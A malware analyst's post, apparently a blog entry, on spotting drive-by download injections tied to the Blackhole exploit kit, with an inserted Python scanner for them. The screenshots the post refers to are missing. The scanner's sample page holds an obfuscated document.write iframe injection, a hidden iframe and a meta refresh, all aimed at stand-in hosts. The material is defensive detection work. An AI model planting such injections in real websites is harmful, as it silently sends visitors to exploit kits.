Oftentimes, these scripts can be found at the top or the bottom of the webpage:
Lately, however, I’m noticing that it’s getting harder to find them. Here are a couple from just this week alone!
In this drive-by, the malicious script was buried in the “jquery.js” file. Do you see it? I nearly missed it myself. (Hint: look for the document.write statement.)
I’m trying to develop a method of identifying malicious scripts and working backwards to locate where they came from. The first hurdle is identifying the malicious script itself. As malware analysts, we can generally recognize that a script is suspicious just by looking at it. Here’s an example:
Here are results from actual drive-bys using the above methodology:
In this drive-by, there was an iframe to Blackhole from the main website.
Last one. The main webpage loaded a local file via an iframe which had a meta refresh tag to Blackhole.
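The three indicators that showed up in these drive-bys (a document.write injection appended to a library file such as jquery.js, a tiny or hidden iframe pointing at an outside host, and a meta refresh tag pointing at an outside host) can be pulled into one scanner. The script below is an added example, not tooling from the post; the sample page and the `.invalid` hostnames are constructed for illustration, and the size and obfuscation thresholds are my own assumptions.

```python
"""Scan an HTML document for the drive-by indicators discussed above.

Added example: finds document.write calls with obfuscated/iframe payloads,
tiny or hidden iframes to outside hosts, and meta refresh redirects to
outside hosts. Sample page and hostnames are constructed, not real captures.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a jquery.js-style inline script with an appended
# document.write injection, a 1x1 hidden iframe, and a meta refresh redirect.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=http://landing.example.invalid/kit.php">
<script type="text/javascript" src="/js/jquery.js"></script>
<script>
/* jQuery v1.4.2 ... (legitimate library code would be here) */
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fevil.example.invalid%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));
</script>
</head><body>
<iframe src="http://other.example.invalid/x.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<p>Welcome to our site.</p>
</body></html>"""

WRITE_RE = re.compile(r"document\.write\s*\(", re.I)
# Typical wrappers used to hide the written markup, or raw percent-encoding.
OBFUSCATION_RE = re.compile(
    r"(unescape|String\.fromCharCode|eval)\s*\(|%[0-9a-f]{2}%[0-9a-f]{2}", re.I)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
REFRESH_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.I)


class IndicatorScanner(HTMLParser):
    """Collects (kind, detail) findings while walking the page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names for us
        if tag == "script":
            self._in_script = True
            self._script_buf = []
        elif tag == "iframe":
            self._check_iframe(a)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL_RE.search(a.get("content", ""))
            if m and self._is_external(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self._check_script("".join(self._script_buf))

    def _is_external(self, url):
        host = urlparse(url).hostname
        return bool(host) and host != self.page_host

    def _check_iframe(self, a):
        # Assumed threshold: frames of 2px or less are effectively invisible.
        try:
            tiny = int(a.get("width", "100")) <= 2 or int(a.get("height", "100")) <= 2
        except ValueError:
            tiny = False
        hidden = bool(HIDDEN_STYLE_RE.search(a.get("style", "")))
        src = a.get("src", "")
        if (tiny or hidden) and self._is_external(src):
            self.findings.append(("hidden-iframe", src))

    def _check_script(self, code):
        for m in WRITE_RE.finditer(code):
            # Inspect the argument region following the call.
            tail = code[m.end():m.end() + 400]
            if OBFUSCATION_RE.search(tail) or "<iframe" in tail.lower():
                self.findings.append(("document.write", tail.strip()[:80]))


def scan(html, page_host):
    """Return a list of (kind, detail) indicators found in html."""
    s = IndicatorScanner(page_host)
    s.feed(html)
    s.close()
    return s.findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_HTML, "www.example.invalid"):
        print(f"{kind:16} {detail}")
```

Run against a saved copy of the page (or each fetched script file wrapped in a `<script>` tag) with the site's own hostname as `page_host`; anything referencing a host other than the site's own is reported, while ordinary embeds like the visible YouTube frame in the sample are left alone. The document.write check looks at the 400 characters following the call, so a legitimate library that uses document.write with a plain literal string is not flagged.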
Looks promising but I still need to figure out how to find those pesky malicious needles in the proverbial haystack.